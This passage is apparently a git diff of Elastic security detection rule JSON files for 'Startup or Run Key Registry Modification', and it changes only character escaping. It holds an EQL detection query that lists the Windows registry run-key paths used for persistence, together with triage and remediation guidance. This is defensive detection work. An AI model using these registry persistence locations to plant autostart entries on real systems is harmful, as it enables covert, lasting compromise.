\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as 
this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n 
process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Slack Technologies, Inc.\" and\n process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json 
index 639d6519603..171f7c6216d 100644 
--- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json 
+++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_107.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as 
this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n 
process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Slack Technologies, Inc.\" and\n process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json index 6aa2441dc00..87599098d52 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like 
reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as 
